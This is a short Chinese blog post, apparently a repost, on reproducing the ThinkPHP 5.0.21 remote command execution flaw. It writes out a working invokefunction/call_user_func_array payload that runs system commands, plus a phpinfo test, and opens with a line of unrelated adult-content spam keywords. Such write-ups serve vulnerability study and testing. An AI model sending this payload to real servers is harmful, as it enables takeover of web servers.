国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

  1. Toy模板網(wǎng)首頁
  2. >Toy博客

ThinkPHP5.0.21遠程命令執(zhí)行漏洞

2年前作者:ANYOUZHEN分類:Toy博客閱讀(22)違法舉報

這篇具有很好參考價值的文章主要介紹了ThinkPHP5.0.21遠程命令執(zhí)行漏洞。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

漏洞出現(xiàn)的背景

ThinkPHP是?款運?極?的PHP開發(fā)框架。
其5.0.23以前的版本中,獲取method的?法中沒有正確處理?法名,
導(dǎo)致攻擊者可以調(diào)?Request類任意?法并構(gòu)造利?鏈,從?導(dǎo)致遠程代碼執(zhí)?漏洞。
由于ThinkPHP5框架對控制器名沒有進??夠的安全檢測,導(dǎo)致在沒有開啟強制路由的情況下,構(gòu)造特定的請求。

從網(wǎng)上下載源碼

ThinkPHP5.0.21遠程命令執(zhí)行漏洞

從網(wǎng)上搜索thinkphp5.0.21漏洞,發(fā)現(xiàn)存在遠程命令執(zhí)行漏洞

ThinkPHP 5.0<5.0.23&5.1<5.1.31版本在沒有開啟強制路由的情況下可能存在遠程代碼執(zhí)行漏洞。攻擊者通過該漏洞可能完全控制Web服務(wù)器。?

ThinkPHP5.0.21遠程命令執(zhí)行漏洞

:網(wǎng)頁只顯示了tinkphp,我們已知thinkphp是存在漏洞的,直接Github搜索thinkphp漏洞(https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection),發(fā)現(xiàn):

ThinkPHP5.0.21遠程命令執(zhí)行漏洞

通過github上面的漏洞報告可知,我們可以

/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=命令參數(shù)

就是遠程代碼執(zhí)行漏洞啦,輸入命令就返回什么 。

舉個例子,我們可以讓他執(zhí)行phpinfo操作,輸入;

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

成功執(zhí)行命令執(zhí)行漏洞,回顯php

ThinkPHP5.0.21遠程命令執(zhí)行漏洞

?文章來源地址http://www.zghlxwxcb.cn/news/detail-443669.html

到了這里,關(guān)于ThinkPHP5.0.21遠程命令執(zhí)行漏洞的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費用

相關(guān)文章

  • ThinkPHP5 5.0.23遠程代碼執(zhí)行漏洞+webshell工具連接(復(fù)現(xiàn)詳細過程)

    ThinkPHP5 5.0.23遠程代碼執(zhí)行漏洞+webshell工具連接(復(fù)現(xiàn)詳細過程)

    目錄 漏洞介紹 漏洞復(fù)現(xiàn) 1.環(huán)境搭建 2.漏洞利用 5.0.23以前的版本中,獲取method的方法中沒有正確處理方法名,導(dǎo)致攻擊者可以調(diào)用Request類任意方法并構(gòu)造利用鏈,從而導(dǎo)致遠程代碼執(zhí)行漏洞。 1.環(huán)境搭建 使用docker容器搭建漏洞環(huán)境,進入漏洞文件所在。 cd vulhub/thinkphp/5.0.2

    2024年02月06日
    瀏覽(21)
  • Thinkphp5.x全漏洞復(fù)現(xiàn)分析

    Thinkphp5.x全漏洞復(fù)現(xiàn)分析

    我們可以把namespace理解為一個單獨的空間,事實上它也就是一個空間而已,子命名空間那就是空間里再劃分幾個小空間,舉個例子: 當(dāng)有多個子命名空間有相同名稱類時,不指定使用哪個命名空間的情況下取最后定義的命名空間中的類,比如上面的 dog 取的時 dogC 中的類,在

    2024年04月22日
    瀏覽(24)
  • thinkphp5.0.24反序列化漏洞分析

    thinkphp5.0.24反序列化漏洞分析

    thinkphp5框架: thinkphp5的入口文件在 publicindex.php ,訪問 反序列化起點 寫一個反序列化入口點 全局搜索 __destruct() 函數(shù) thinkphp_5.0.24thinkphplibrarythinkprocesspipesWindows.php 中的 __destruct() 函數(shù),調(diào)用了removeFiles() 跟進removeFiles(),第163行的file_exists可以觸發(fā) __toString 方法 全局搜索

    2023年04月08日
    瀏覽(31)
  • ThinkPHP5.0.0~5.0.23RCE 漏洞分析及挖掘思路

    ThinkPHP5.0.0~5.0.23RCE 漏洞分析及挖掘思路

    前言 本節(jié)我將分析thinkphp5.0.x 版本的RCE漏洞,根據(jù)漏洞的研究模擬挖掘此漏洞的思路 本次分析框架下載,由于官方已經(jīng)下架了相關(guān)的下載接口,這里我們用三方下載 一份v5.0.22版本的 升級中... https://www.codejie.net/5828.html 附贈?thinkphp5.0官方開發(fā)手冊 架構(gòu)總覽 · ThinkPHP5.0完全開

    2024年01月18日
    瀏覽(29)
  • nginxWebUI 遠程命令執(zhí)行漏洞

    nginxWebUI 遠程命令執(zhí)行漏洞

    nginxWebUI是一款圖形化管理nginx配置的工具,能通過網(wǎng)頁快速配置nginx的各種功能,包括HTTP和TCP協(xié)議轉(zhuǎn)發(fā)、反向代理、負載均衡、靜態(tài)HTML服務(wù)器以及SSL證書的自動申請、續(xù)簽和配置,配置完成后可以一鍵生成nginx.conf文件,并控制nginx使用此文件進行啟動和重載。nginxWebUI后臺提

    2024年02月11日
    瀏覽(20)

  • RCE(遠程命令執(zhí)行)漏洞詳解

    RCE(remote command/code execute,遠程命令執(zhí)行)漏洞 遠程代碼執(zhí)行 (RCE) 攻擊是指攻擊者可以在一個組織的計算機或網(wǎng)絡(luò)上運行惡意代碼。執(zhí)行攻擊者控制的代碼的能力可用于各種目的,包括部署額外的惡意軟件或竊取敏感數(shù)據(jù)。 遠程代碼執(zhí)行攻擊通常通過網(wǎng)絡(luò)應(yīng)用程序和網(wǎng)絡(luò)基礎(chǔ)

    2024年04月10日
    瀏覽(30)
  • 【漏洞復(fù)現(xiàn)】銳捷 EWEB auth 遠程命令執(zhí)行漏洞

    【漏洞復(fù)現(xiàn)】銳捷 EWEB auth 遠程命令執(zhí)行漏洞

    免責(zé)聲明:文章來源互聯(lián)網(wǎng)收集整理,請勿利用文章內(nèi)的相關(guān)技術(shù)從事非法測試,由于傳播、利用此文所提供的信息或者工具而造成的任何直接或者間接的后果及損失,均由使用者本人負責(zé),所產(chǎn)生的一切不良后果與文章作者無關(guān)。該文章僅供學(xué)習(xí)用途使用。 ?? ? ? ? ? ?

    2024年03月12日
    瀏覽(15)
  • RCE遠程命令執(zhí)行漏洞挖掘思路

    RCE遠程命令執(zhí)行漏洞挖掘思路

    1.URL上 在 url參數(shù)上 ,不僅僅可能存在ssrf漏洞,也有很大概率存在命令執(zhí)行,很大可能調(diào)用系統(tǒng)命令如curl。 payload例子: index.php?id=2;}phpinfo();/* ttp://www.xxx.com/cmd.php?cmd=phpinfo() 比如訪問到如下URL,在jsp后面嘗試加參數(shù),比如path(什么參數(shù)需要試) ? ? http://x.x.x.x:28076/file/dirF

    2024年02月01日
    瀏覽(21)
  • 漏洞復(fù)現(xiàn) - - -Struts2(s2-045)遠程命令執(zhí)行漏洞

    漏洞復(fù)現(xiàn) - - -Struts2(s2-045)遠程命令執(zhí)行漏洞

    Struts2是一個基于MVC設(shè)計模式的Web應(yīng)用框架,它本質(zhì)上相當(dāng)于一個servlet,在MVC設(shè)計模式中,Struts2作為控制器(Controller)來建立模型與視圖的數(shù)據(jù)交互。Struts 2是Struts的下一代產(chǎn)品,是在 struts 1和WebWork的技術(shù)基礎(chǔ)上進行了合并的全新的Struts 2框架。其全新的Struts 2的體系結(jié)構(gòu)與St

    2024年01月20日
    瀏覽(30)

  • 藍凌OA 漏洞學(xué)習(xí)——treexml.tmpl 遠程命令執(zhí)行漏洞

    注:該文章來自作者日常學(xué)習(xí)筆記,請勿利用文章內(nèi)的相關(guān)技術(shù)從事非法測試,如因此產(chǎn)生的一切不良后果與作者無關(guān)。 目錄 一、漏洞概述?? 二、影響版本 三、資產(chǎn)測繪?? 四、漏洞復(fù)現(xiàn)

    2024年02月13日
    瀏覽(18)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包